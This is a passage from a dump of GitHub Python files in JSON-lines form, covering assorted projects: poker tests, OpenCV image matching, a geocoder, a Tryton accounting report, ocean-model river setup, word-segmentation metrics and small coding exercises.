\"\"\"\n player = chinese.Player(name=\"Dan Harrington\", points=574)\n player.place_card(card=bluff.Card(\"As\"), hand=\"bottom\")\n assert len(player.bottom_hand) == 1\n\n\nclass TestGame:\n \"\"\" Test game dynamics.\"\"\"\n\n @staticmethod\n def _new_round():\n \"\"\" Start a new round. \"\"\"\n pkr = chinese.Poker(n_seats=2)\n chris = chinese.Player(name=\"Chris Moneymaker\", points=0)\n sam = chinese.Player(name=\"Sam Farha\", points=0)\n pkr.add_players(players=[chris, sam])\n return pkr.new_round()\n\n def test_round(self):\n \"\"\" Test initializing a new round. Check if number of cards is correct. 
\"\"\"\n rnd = self._new_round()\n player1 = rnd.players[0]\n assert len(player1.hand) == 13\n","repo_name":"matheusccouto/bluff","sub_path":"tests/test_chinese.py","file_name":"test_chinese.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"71118770017","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tkinter import filedialog\nfrom tkinter import Tk\n\n\ndef file_browse():\n \"\"\"\n Function to read in the files\n ----------------------------------------\n root.filename : Desired image file path\n \"\"\"\n\n root = Tk()\n root.withdraw()\n root.filename = filedialog.askopenfilename(parent=root, title=\"Select the Image\")\n\n return root.filename\n\n\ndef get_filteredimage(image, lower, upper):\n \"\"\"\n Function to calculate a mask which threshold the desired area\n ------------------------------------------------------------------\n image : Original Image\n\n lower : Lower threshold Limit\n\n upper : upper threshold limit\n ------------------------------------------------------------------\n rgb_filtered : Image after threshold\n \"\"\"\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n res, mask = cv2.threshold(gray, lower, upper, cv2.THRESH_BINARY)\n mask1 = cv2.inRange(image, (lower, lower, lower), (255, 255, 255))\n\n rgb_filtered = cv2.bitwise_and(image, image, mask=mask)\n\n return rgb_filtered\n\n\ndef plot_image(image, title=\"Plot\"):\n \"\"\"\n Function that plots the image\n -------------------------------------\n image : Image to be display\n\n title : title of the image\n \"\"\"\n\n # cv2.imshow(title, image)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n plt.imshow(image)\n plt.show()\n\n\ndef template_matching(image, temp, threshold):\n \"\"\"\n Function tries matching the given template in the given image\n according to a threshold\n -------------------------------------------------------------\n image : Original image\n\n temp : Template Image\n\n threshold : The threshold at which the template is to be matched\n -------------------------------------------------------------\n _loc : Tuple of detected points\n \"\"\"\n\n filt_block_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n res = cv2.matchTemplate(filt_block_gray, temp, cv2.TM_CCOEFF_NORMED)\n _loc = np.where(res >= threshold)\n\n return _loc\n\n\ndef feature_matching(image, temp):\n \"\"\"\n Function tries to match the features of the given template and\n the given image to find the desired object\n -------------------------------------------------------------\n image : Original image\n\n temp : Template Image\n -------------------------------------------------------------\n _matches : Detected matches\n\n _kp1 : Image keypoints\n\n _kp2 : Template keypoints\n \"\"\"\n\n surf = cv2.xfeatures2d.SURF_create()\n\n kp1, des1 = surf.detectAndCompute(image, None)\n kp2, des2 = surf.detectAndCompute(temp, None)\n\n bf = cv2.BFMatcher(cv2.NORM_L1, crossCheck=False)\n _matches = bf.match(des1, des2)\n _matches = sorted(_matches, key=lambda x: x.distance)\n\n # img3 = cv2.drawMatches(image, kp1, temp, kp2, _matches[:10], None, flags=2)\n # plt.imshow(img3)\n # plt.show()\n\n return _matches[:7], kp1, kp2\n\n\ndef pixel_positions(key1, key2, _matches):\n \"\"\"\n Function extracts the spatial coordinates from the\n matched feature key points\n -----------------------------------------------------\n key1 : Keypoints for original image\n\n Key2 : Keypoints for template\n\n _matches : 
Matched feature points\n -----------------------------------------------------\n list_kp1 : Coordinates in original image\n\n list_kp2 : Coordinates in template\n\n matches : Matches for the refined coordinates\n \"\"\"\n\n list_kp1 = []\n list_kp2 = []\n list_mat = []\n\n # For each match...\n for mat in _matches:\n # Get the matching keypoints for each of the images\n img1_idx = mat.queryIdx\n img2_idx = mat.trainIdx\n\n # x - columns\n # y - rows\n # Get the coordinates\n (x1, y1) = key1[img1_idx].pt\n (x2, y2) = key2[img2_idx].pt\n\n # if (x2, y2) == (29.39104652404785, 26.495248794555664):\n list_kp1.append((x1, y1))\n list_kp2.append((x2, y2))\n list_mat.append(mat)\n\n return list_kp1, list_kp2, list_mat\n\n\ndef position_refinement(_loc, _kp1):\n \"\"\"\n Function further filters and refines the detected\n pixel positions to obtain desired result\n -------------------------------------------------\n _loc : Points detected after template matching\n\n _kp1 : Keypoint coordinates after feature matching\n -------------------------------------------------\n refined : Final coordinates\n\n refined_keys : Final key point coordinates\n \"\"\"\n\n points_list = []\n key_points = []\n _tol = 50\n\n for pts in zip(*_loc[::-1]):\n for pt1 in _kp1:\n if np.abs(pt1[0] - pts[0]) < _tol and np.abs(pt1[1] - pts[1] < _tol):\n points_list.append(pts)\n key_points.append(pt1)\n\n print(len(points_list))\n\n refined = []\n refined_key = []\n _tol = 5\n for ptr2 in range(0, len(points_list) - 1, 1):\n p1 = points_list[ptr2]\n p2 = points_list[ptr2 + 1]\n if len(refined) == 0:\n refined.append(p1)\n refined_key.append(key_points[ptr2])\n if np.abs(p2[0] - p1[0]) > _tol and np.abs(p2[1] - p1[1]) > _tol:\n # print(\"ptr1:\", p1)\n # print(\"ptr2:\", p2)\n if ptr2 not in refined:\n refined.append(p2)\n refined_key.append(key_points[ptr2+1])\n\n return refined, refined_key\n","repo_name":"urvang96/Ground-Control-Point-Detector","sub_path":"GCPfunctionDefinations.py","file_name":"GCPfunctionDefinations.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73518254817","text":"from typing import List\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n rows, cols = len(matrix), len(matrix[0])\n f, t = 0, rows*cols-1\n while f <= t:\n m = (f+t)//2\n num = matrix[m//cols][m%cols]\n if num == target:\n return True\n elif target < num:\n t = m - 1\n else:\n f = m + 1\n return False\n","repo_name":"danzay42/SandBox","sub_path":"python/algorithms/leetcode/search_2d_matrix.py","file_name":"search_2d_matrix.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19857489207","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# version: 1.0\n# licence : gpl-3.0 or superior\n# author: JDev\n# email: gaetan.bruel@jdev.fr\n# date: 29/01/2020\n# description : a geocoder according to this data https://docs.google.com/spreadsheets/d/1yZv9w9zRKwrGTaR-YzmAqMefw4wMlaXocejdxZaTs6w \n\nfrom os import listdir, getcwd\nfrom os.path import isfile, join\nimport csv, json\nfrom geopy.geocoders import Nominatim\nfrom config import *\nimport urllib.request\n\nPATH = getcwd() + DATAPATH\nn = 1 \n\n##\n# use geocoder to get XY fro address\n# #\ndef geocode(address):\n geocoder = Nominatim()\n # geocode\n location = geocoder.geocode(address, True, 30)\n return location\n\n##\n# create simple 
geojson base\n# #\ndef createJson():\n json = {}\n json['type'] = 'FeatureCollection'\n json['features'] = []\n return json\n\n##\n# create json properties from feature infos\n# #\ndef locationToJson(line, location, colNames):\n i = 0\n properties = {}\n # geom\n geometry = {\n 'type':'Point',\n 'coordinates': [location.longitude, location.latitude]\n }\n\n # get properties from col\n for col in colNames: \n # save props\n properties[col] = line[i]\n # join json\n i+=1\n feature = {\n 'type': 'Feature',\n 'geometry': geometry,\n 'properties': properties\n }\n return feature\n\n##\n# from line, get location\n# #\ndef getLocation(line) :\n # clean adress\n adresse = ''\n if line[0] and line[1]:\n adresse = line[0] + \", \" + line[1]\n elif line[1]:\n adresse = line[1]\n adresse = adresse.replace('Mainland China', 'China')\n # geocode\n location = geocode(adresse)\n # create feature for json\n return location\n\n##\n# read and convert csv feature to geojson\n# #\ndef csvToJson(fPath, delimiter):\n inputFile = open(fPath, 'rt') \n inputData = csv.reader(inputFile, delimiter = delimiter)\n outputData = csv.writer(outputFile, delimiter = ',', lineterminator = '\\n')\n colNames = next(inputData)\n for line in inputData:\n location = getLocation(line)\n feature = locationToJson(line, location, colNames)\n outJson['features'].append(feature)\n\noutJson = createJson()\n\n# parse files from dir\nfor f in listdir(PATH):\n if isfile(join(PATH,f)):\n print('READ FILE' + str(n) + '>>>>')\n try:\n csvToJson(join(PATH,f),';')\n except Exception as inst:\n print(inst)\n n = n + 1\n\n# parse file from web\nprint('GET CSV FROM WEB >>>>')\nurllib.request.urlretrieve(URL, INPUTFILE)\nprint('GEOCODE FILE >>>>')\ncsvToJson(INPUTFILE, ',')\n\n# export json to file\nwith open(OUTPUTJSON, 'w') as outfile:\n json.dump(outJson, outfile)\n\nprint('END SCRIPT >>>>')","repo_name":"Gaetanbrl/coronageocoder","sub_path":"scripts/createjson.py","file_name":"createjson.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16796562502","text":"\"\"\"Unit tests for extension middleware.\"\"\"\n\nimport kgb\nfrom django.test import override_settings\n\nfrom djblets.extensions.extension import Extension\nfrom djblets.extensions.testing import ExtensionTestCaseMixin\nfrom djblets.testing.testcases import TestCase\n\n\nMIDDLEWARE = [\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'djblets.extensions.middleware.ExtensionsMiddleware',\n 'djblets.extensions.middleware.ExtensionsMiddlewareRunner',\n]\n\n\nclass Middleware(object):\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n return self.get_response(request)\n\n\nclass MyTestExtension(Extension):\n middleware = [\n 'djblets.extensions.tests.test_middleware.Middleware',\n ]\n\n\nclass MiddlewareTests(kgb.SpyAgency, ExtensionTestCaseMixin, TestCase):\n \"\"\"Unit tests for extension middleware.\"\"\"\n\n @override_settings(MIDDLEWARE=MIDDLEWARE)\n def test_extension_middleware(self):\n \"\"\"Testing extension middleware\"\"\"\n self.spy_on(Middleware.__call__, owner=Middleware)\n self.setup_extension(MyTestExtension)\n self.client.get('/')\n 
self.assertSpyCalled(Middleware.__call__)\n","repo_name":"djblets/djblets","sub_path":"djblets/extensions/tests/test_middleware.py","file_name":"test_middleware.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"34"} +{"seq_id":"72101764256","text":"from datetime import *\nfrom gather_input import *\n\n# parse input\nstart_time = datetime.now().replace(month=int(date_str[3:]), day=int(date_str[:2]), hour=(int(start_time_str[:2])), minute=int(start_time_str[3:]), second=1)\nend_time = datetime.now().replace(month=int(date_str[3:]), day=int(date_str[:2]), hour=(int(end_time_str[:2])), minute=int(end_time_str[3:]), second=1)\ncurrent_time = start_time\ninterval_duration = timedelta(minutes=interval_duration)\nshort_break_duration = timedelta(minutes=short_break_duration)\nlong_break_duration = timedelta(minutes=long_break_duration)\n\n\n","repo_name":"jakobnunnendorf/Timebloc","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25519067768","text":"import numpy as np\nimport netCDF4\nimport pyroms\nimport sys\n\nimport read_host_info\nsv = read_host_info.read_host_info()\nin_dir = sv['in_dir']\nout_dir = sv['out_dir']\n\nif len(sys.argv)>1:\n grd1 = sys.argv[-1]\nelse:\n grd1 = 'GB_lr'\n\nmy_year = 2008\ndischarge_depth = 3\ngrd = pyroms.grid.get_ROMS_grid(grd1)\nh = grd.vgrid.h\nCs_r = grd.vgrid.Cs_r\n\ntag = 'Hill'\nout_file = out_dir + 'frc/' + grd.name + '_rivers_' + str(my_year) + '_' + tag + '.nc'\n\n# Set the vertical distribution of the river transport.\n\nfh = netCDF4.Dataset(out_file, 'a', format='NETCDF3_64BIT')\nN = len(fh.dimensions['s_rho'])\nNr = len(fh.dimensions['river'])\neta = fh.variables['river_Eposition'][:]\nxi = fh.variables['river_Xposition'][:]\nsign = fh.variables['river_sign'][:]\ndirection = fh.variables['river_direction'][:]\n\nhh = np.zeros(Nr)\nfor i in range(Nr):\n if sign[i] == 1:\n hh[i] = h[eta[i], xi[i]]\n else:\n if direction[i] == 0:\n hh[i] = h[eta[i], xi[i]-1]\n else:\n hh[i] = h[eta[i]-1, xi[i]]\n\nvshape = np.zeros((N, Nr))\nfor i in range(Nr):\n z = -Cs_r*hh[i]\n msk = z <= discharge_depth\n weight = np.arange(sum(msk))\n vshape[msk, i] = weight\n vshape[:, i] = vshape[:, i]/sum(vshape[:, i])\n\nfh.variables['river_Vshape'][:] = vshape\nfh.close()\n","repo_name":"ChuningWang/gb_roms","sub_path":"make_rivers/obsolete/set_vshape.py","file_name":"set_vshape.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"70855844259","text":"# How do you reverse a given string in place? 
\nstr = 'How do you reverse a given string in place?'\nstr = str[::-1]\nprint(str)\n\n#2: Reversed\nstr = 'How do you reverse a given string in place?'\nstr = \"\".join(list(reversed(str)))\nprint(str)\n\n#3: Using while loop\nstr = 'How do you reverse a given string in place?'\ntemp_str = ''\nindex = len(str) - 1\nwhile(index >= 0):\n    temp_str = temp_str + str[index]\n    index -= 1\nprint(temp_str)\n\n# Reverse the order of words in a string\nstr = 'Reverse the order of words in a string'\nprint(\" \".join(str.split()[::-1]))\n\n# Reverse internal content of each word\nstring = 'Reverse internal content of each word'\nprint(\" \".join(list(map(lambda x: x[::-1], string.split(\" \")))))\n\nstring = 'REVERSE internal content of every second word present in the given string'\nrev = []\nfor index, word in enumerate(string.split(\" \")):\n    if (index%2 == 0):\n        rev.append(word)\n    else:\n        rev.append(word[::-1])\nprint(\" \".join(rev))\n\n\n# Program for the requirement. Input: a4z2b3c2, expected output: aaaabbbcczz (sorted)\na = \"a4z2b3c2\"\nres = []\nfor pos in range(0, len(a), 2):\n    char = a[pos:pos+2][0]\n    rep = a[pos:pos+2][1]\n    res.append(char * int(rep))\nprint(\"\".join(list(sorted(res))))\n\n# Program for the requirement. Input: aaaabbbccz, expected output: 4a3b2c1z\nimport collections\nresults = collections.Counter('aaaabbbccz')\nfor key,value in results.items():\n    print(\"{}{}\".format(value,key), end=\"\")\n\n# Check if two strings are anagrams\n# An anagram is a word or phrase formed by rearranging the letters of a different word or phrase, typically using all the original letters exactly once.\na = \"abcde\"\nb = \"edcabbbb\"\n\nif ((\"\".join(sorted(a))) == (\"\".join(sorted(b)))):\n    print(\"\\n{} & {} are anagrams\".format(a, b))\nelse:\n    print(\"\\n{} & {} are NOT anagrams\".format(a, b))","repo_name":"soumyazyx/Python","sub_path":"PythonBasics/StringInterviewQAs.py","file_name":"StringInterviewQAs.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"4452585633","text":"from typing import List\n\nclass Solution:\n    def maxProfit(self, prices: List[int]) -> int:\n        \n        #Optimal approach\n        max_prof = 0\n        min_prof = float(\"inf\")\n        for i in range(len(prices)):\n            min_prof = min(min_prof, prices[i])\n            max_prof = max(max_prof, prices[i] - min_prof)\n        return max_prof\n\n        \n        #Bruteforce Approach\n        # max_prof = 0 \n        # for i in range(len(prices)):\n        #     curr = 0\n        #     for j in range(i+1,len(prices)):\n        #         prof = prices[j] - prices[i]\n        #         if prof <=0:\n        #             continue\n        #         else:\n        #             max_prof = max(max_prof,prof)\n        #     return max_prof\n\n\n\n\n\n","repo_name":"Madhukar-R12/LeetCode","sub_path":"0121-best-time-to-buy-and-sell-stock/0121-best-time-to-buy-and-sell-stock.py","file_name":"0121-best-time-to-buy-and-sell-stock.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"24642068588","text":"class SlideWindow():\n    def __init__(self, frames, window_length, hop_length):\n        self.frames = frames\n        self.window_length = int(window_length)\n        self.hop_length = int(hop_length)\n\n    # Simplest form of an iterable object, no separate iterator needed; index auto-increments from 0\n    def __getitem__(self, index):\n        sti = index * self.hop_length\n        edi = sti + self.window_length\n        if edi > len(self.frames):\n            raise IndexError()\n        return 
self.frames[sti:edi]\n","repo_name":"asqqwwd/Jamming","sub_path":"utils/iters.py","file_name":"iters.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6867557344","text":"# -*- coding: utf-8 -*-\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\nimport urllib\nfrom itertools import tee, izip\nfrom trytond.pool import Pool, PoolMeta\nfrom trytond.protocols.jsonrpc import JSONEncoder, json\nfrom sql.aggregate import Sum\nfrom trytond.transaction import Transaction\n\nfrom openlabs_report_webkit import ReportWebkit\n\n__metaclass__ = PoolMeta\n__all__ = ['AccountMoveLine']\n\n\nclass AccountMoveLine:\n 'Account Move Line'\n __name__ = 'account.move.line'\n\n def origin_details(self):\n \"\"\"\n Returns the origin as a string to print on checks\n \"\"\"\n Model = Pool().get('ir.model')\n\n try:\n self.origin.rec_name\n except AttributeError:\n return None\n\n model, = Model.search([\n ('model', '=', self.origin.__name__)\n ])\n return \"%s, %s\" % (model.name, self.origin.rec_name)\n\n\ndef pairwise(iterable):\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\n a, b = tee(iterable)\n next(b, None)\n return izip(a, b)\n\n\nclass AgedBalance(ReportWebkit):\n __name__ = 'account.aged_balance'\n\n @classmethod\n def get_context(cls, objects, data):\n pool = Pool()\n Party = pool.get('party.party')\n MoveLine = pool.get('account.move.line')\n Move = pool.get('account.move')\n Account = pool.get('account.account')\n Company = pool.get('company.company')\n Date = pool.get('ir.date')\n cursor = Transaction().connection.cursor()\n report_context = super(AgedBalance, cls).get_context(objects, data)\n\n line = MoveLine.__table__()\n move = Move.__table__()\n account = Account.__table__()\n\n company = Company(data['company'])\n report_context['digits'] = company.currency.digits\n report_context['posted'] = data['posted']\n with Transaction().set_context(context=report_context):\n line_query, _ = MoveLine.query_get(line)\n\n def get_current_by_party(today):\n \"\"\"\n Not Due Yet + Without Maturity date\n \"\"\"\n term_query = line.maturity_date == None\n term_query |= line.maturity_date > today\n cursor.execute(\n *line.join(\n move, condition=line.move == move.id\n ).join(\n account, condition=line.account == account.id\n ).select(\n line.party, Sum(line.debit) - Sum(line.credit),\n where=(line.party != None) &\n account.active &\n account.kind.in_(kind) &\n (line.reconciliation == None) &\n (account.company == data['company']) &\n term_query &\n line_query,\n group_by=line.party,\n having=(Sum(line.debit) - Sum(line.credit)) != 0)\n )\n return cursor.fetchall()\n\n def get_balance_by_party(to_date, from_date):\n term_query = line.maturity_date <= to_date\n term_query &= line.maturity_date > from_date\n cursor.execute(\n *line.join(\n move, condition=line.move == move.id\n ).join(\n account, condition=line.account == account.id\n ).select(\n line.party, Sum(line.debit) - Sum(line.credit),\n where=(line.party != None) &\n account.active &\n account.kind.in_(kind) &\n (line.reconciliation == None) &\n (account.company == data['company']) &\n term_query &\n line_query,\n group_by=line.party,\n having=(Sum(line.debit) - Sum(line.credit)) != 0)\n )\n return cursor.fetchall()\n\n terms = (data['term1'], data['term2'], data['term3'])\n if data['unit'] == 'month':\n coef = timedelta(days=30)\n else:\n coef = timedelta(days=1)\n\n today = Date.today()\n dates 
= [\n today,\n today - data['term1'] * coef, # 0-term1\n today - data['term2'] * coef, # term1-term2\n today - data['term3'] * coef, # term2-term3\n datetime.min, # older\n ]\n\n kind = {\n 'both': ('payable', 'receivable'),\n 'supplier': ('payable',),\n 'customer': ('receivable',),\n }[data['balance_type']]\n\n res = defaultdict(lambda: defaultdict(lambda: Decimal('0')))\n totals = defaultdict(lambda: Decimal('0'))\n for position, date_range in enumerate(pairwise(dates)):\n term = ['term1', 'term2', 'term3', 'older'][position]\n for party, balance in get_balance_by_party(*date_range):\n res[party][term] = balance\n totals[term] += balance\n\n for party, balance in get_current_by_party(today):\n res[party]['current'] = balance\n totals['current'] += balance\n\n for party in Party.browse(res.keys()):\n res[party.id]['total'] = party.receivable + party.payable\n totals['net'] += res[party.id]['total']\n\n def get_balance_url(party, term=None):\n \"Given a party and term number (1-3) or older return URI\"\n path = MoveLine.__url__\n domain = [\n ('reconciliation', '=', None),\n ('party', '=', party.id),\n ('account.kind', 'in', kind),\n ]\n if data['posted']:\n domain.append(('move.state', '=', 'posted'))\n\n if term == 'current':\n domain.append([\n 'OR', [\n ('maturity_date', '>', today),\n ], [\n ('maturity_date', '=', None),\n ],\n ])\n\n elif term is not None:\n # Add the date range\n term_index = 4 if term == 'older' else term\n to_date, from_date = dates[term_index - 1], dates[term_index]\n domain.extend([\n ('maturity_date', '<=', to_date),\n ('maturity_date', '>', from_date),\n ])\n return ';'.join((\n path,\n urllib.urlencode([\n ('domain', json.dumps(domain, cls=JSONEncoder))\n ])\n ))\n\n report_context['parties'] = Party.search([('id', 'in', res.keys())])\n report_context['balances'] = res\n report_context['totals'] = totals\n report_context['kind'] = kind\n report_context['terms'] = terms\n report_context['unit'] = data['unit']\n report_context['currency_code'] = company.currency.code\n report_context['get_balance_url'] = get_balance_url\n\n return report_context\n","repo_name":"trytonus/trytond-report-html-accounts","sub_path":"account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27197312997","text":"from collections import Counter\nimport torch\nfrom torchmetrics import Metric\nfrom typing import List\n\n\nclass TWS_WORD_F1(Metric):\n '''Micro F1 Score'''\n\n def __init__(self,\n ignore_index: int = None,\n constraint_type: str = 'BMES',\n dist_sync_on_step=False):\n super().__init__(dist_sync_on_step=dist_sync_on_step)\n self.ignore_index = ignore_index\n if constraint_type.upper() == 'BMES':\n self.constraint_type = constraint_type\n self.ids = dict({0: 'B', 1: 'M', 2: 'E', 3: 'S'})\n else:\n raise NotImplementedError\n\n # (# w_ref ∩ w_hyp)\n self.add_state('correct_preds',\n default=torch.tensor(0),\n dist_reduce_fx='sum')\n # (# w_hyp)\n self.add_state('total_preds',\n default=torch.tensor(0),\n dist_reduce_fx='sum')\n # (# w_ref)\n self.add_state('total_correct',\n default=torch.tensor(0),\n dist_reduce_fx='sum')\n # (# w_ref + # w_hyp)\n self.add_state('total_tokens',\n default=torch.tensor(0),\n dist_reduce_fx='sum')\n\n def __repr__(self):\n rep = 'TWS_WORD_F1(ignore_index=`{}`, constraint_type=`{}`)'.format(\n self.ignore_index, self.constraint_type.upper())\n return rep\n\n def __state__(self):\n return 'correct_preds: 
{},\\ntotal_preds: {},\\n'.format(\n self.correct_preds,\n self.total_preds) + 'total_correct: {},\\ntotal_tokens: {}'.format(\n self.total_correct, self.total_tokens)\n\n def update(self, preds: List[str], golds: List[str]):\n for _pred, _gold in zip(preds, golds):\n self._update_states(_pred.split(), _gold.split())\n\n def _update_states(self, pred: List, gold: List):\n if len(pred) > len(gold):\n pred, gold = gold, pred\n p_counter = Counter(pred)\n g_counter = Counter(gold)\n\n correct_preds = sum(\n min(p_counter[gk], gv) for gk, gv in g_counter.items())\n total_preds = len(pred)\n total_correct = len(gold)\n total_tokens = (len(gold) + len(pred))\n\n self.correct_preds += correct_preds\n self.total_preds += total_preds\n self.total_correct += total_correct\n self.total_tokens += total_tokens\n\n def compute(self):\n correct_preds = self.correct_preds\n total_preds = self.total_preds\n total_correct = self.total_correct\n\n tp, fp, fn = (correct_preds, total_preds - correct_preds,\n total_correct - correct_preds)\n p = 0.0 if tp + fp == 0 else 1. * tp / (tp + fp)\n r = 0.0 if tp + fn == 0 else 1. * tp / (tp + fn)\n f = 0.0 if p + r == 0 else 2 * p * r / (p + r)\n return f\n","repo_name":"tchayintr/latte-ws","sub_path":"src/utils/word_tws_metrics.py","file_name":"word_tws_metrics.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70338870177","text":"from __future__ import print_function\nfrom __future__ import division\n\nimport glob\nimport os\nimport argparse\nimport json\n\nimport pandas as pd\nimport numpy as np\nimport getdist\nimport getdist.plots\n\n\ndef main(args):\n\n log_roots = glob.glob(args.root)\n\n if args.dim != 0:\n x_dims = [args.dim]\n else:\n x_dims = range(2, 50)\n\n for log_root in log_roots:\n\n print()\n print('------------------------')\n print(log_root)\n print('------------------------')\n print()\n\n # Find\n log_dim_dirs = [[] for _ in x_dims]\n for ix, x_dim in enumerate(x_dims):\n for log_dir in glob.glob(os.path.join(log_root, 'run*')):\n if os.path.exists(os.path.join(log_dir, 'info', 'params.txt')):\n with open(os.path.join(log_dir, 'info', 'params.txt')) as f:\n data = json.load(f)\n if int(data['x_dim']) == x_dim:\n log_dim_dirs[ix].append(log_dir)\n\n for ix, log_dim_dir in enumerate(log_dim_dirs):\n\n logzs = []\n dlogzs = []\n nlikes = []\n ess = []\n\n if len(log_dim_dir) > 0:\n print()\n print('--------')\n print('Dim: %s' % x_dims[ix])\n print('--------')\n print()\n\n for log_dir in log_dim_dir:\n\n with open(os.path.join(log_dir, 'info', 'params.txt')) as f:\n data = json.load(f)\n\n if os.path.exists(os.path.join(log_dir, 'chains', 'chain.txt')):\n names = ['p%i' % i for i in range(int(data['x_dim']))]\n labels = [r'x_{%i}' % i for i in range(int(data['x_dim']))]\n files = getdist.chains.chainFiles(os.path.join(log_dir, 'chains', 'chain.txt'))\n if data['sampler'] == 'nested':\n mc = getdist.MCSamples(os.path.join(log_dir, 'chains', 'chain.txt'), names=names, labels=labels,\n ignore_rows=0.0, sampler='nested')\n else:\n mc = getdist.MCSamples(os.path.join(log_dir, 'chains', 'chain.txt'), names=names, labels=labels,\n ignore_rows=0.3)\n mc.readChains(files)\n if args.feedback > 0:\n print(mc.getMargeStats())\n\n if args.plot:\n g = getdist.plots.getSubplotPlotter()\n g.triangle_plot(mc, filled=True)\n g.export(os.path.join(os.path.join(log_dir, 'plots', 'triangle.png')))\n\n if data['sampler'] == 'nested':\n if 
os.path.exists(os.path.join(log_dir, 'results', 'final.csv')):\n results = pd.read_csv(os.path.join(log_dir, 'results', 'final.csv'))\n print(results)\n logzs.append(results['logz'])\n dlogzs.append(results['logzerr'])\n nlikes.append(results['ncall'])\n ess.append(np.sum(mc.weights) ** 2 / np.sum(mc.weights ** 2))\n\n if len(logzs) > 1:\n print()\n print('Num runs: %s' % (len(logzs)))\n print(r'Log Z: $%4.2f \\pm %4.2f$' % (np.mean(logzs), np.std(logzs)))\n print(r'Log Z error estimate: $%4.2f \\pm %4.2f$' % (np.mean(dlogzs), np.std(dlogzs)))\n print(r'N_like: $%.0f \\pm %.0f$' % (np.mean(nlikes), np.std(nlikes)))\n print(r'Posterior ESS: $%.0f \\pm %.0f$' % (np.mean(ess), np.std(ess)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--root', type=str, default='logs/*')\n parser.add_argument('--dim', type=int, default=0)\n parser.add_argument('--feedback', type=int, default=0)\n parser.add_argument('-plot', action='store_true')\n\n args = parser.parse_args()\n main(args)\n","repo_name":"adammoss/nnest","sub_path":"examples/nested/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"34"} +{"seq_id":"16240259783","text":"# Buyer-ը կունենա money, spent_money և bought_cars ատրիբուտները։\n# Buyer-ի money-ին կփոխանցեք կամայական արժեք` Buyer օբյեկտի ստեղծման պահին,\n# իսկ spent_money-ը պետք է ունենա 0 սկզբնական արժեք (այս ատրիբուտը ցույց կտա գնորդի ծախսած գումարը)։\n\n# Buyer class-ը պետք է ունենա հետևյալ մեթոդները՝\n# 1. buy - գնելու է վաճառողից մեքենա։ Լինելու է public method\n# 2. return_carr - վերադարձնելու է մեքենան (դրանից բխող բոլոր update-ները պետք է կարատվեն)։ Լինելու է public method\n# 3. change_money - ավելացնելու/պակասացնելու է գումարը։ Լինելու է private method\n# 4. add_bought_cars - ավելացնելու է գնված մեքենան bought_cars֊ում։ Պետք է նշվի մեքենայի մոդելը,\n# վաճառողի անուն/ազգանուն/քաղաք, գործարքի ամիս ամսաթիվը հետևյալ ֆորմատով՝ \"տարի-ամիս֊օր\"\n# 5. 
print_my_cars - ցույց կտա գնորգի գնված մեքենաները։ Լինելու է public method\nfrom datetime import datetime\n\nfrom carMarket import CarMarket\nfrom person import Person\n\nfrom car import Car\nfrom seller import Seller\n\n\nclass Buyer(Person):\n\n def __init__(self, first_name, last_name, city, money=50000):\n super().__init__(first_name, last_name, city)\n self.money = money\n self.spent_money = 0\n self.bought_cars = {}\n\n def generate_key(self):\n key = 1\n while True:\n if key in list(self.bought_cars.keys()):\n key += 1\n else:\n return key\n\n def buy(self, car: Car, seller: Seller):\n self.add_bought_cars(car, seller)\n self.money -= car.price - car.discount\n self.spent_money += car.price - car.discount\n\n def return_car(self, car: Car):\n self.bought_cars.pop(car)\n self.money += car.price - car.discount\n\n def change_money(self, money):\n self.money += money\n\n def add_bought_cars(self, car, seller: Seller):\n key = self.generate_key()\n self.bought_cars[key] = {\n 'car': car,\n 'date': datetime.now().strftime(\"%d-%B-%Y\"),\n 'seller': {\n 'name': seller.first_name,\n 'lastname': seller.last_name,\n 'city': seller.city\n }\n }\n\n def print_my_cars(self):\n for i in self.bought_cars:\n 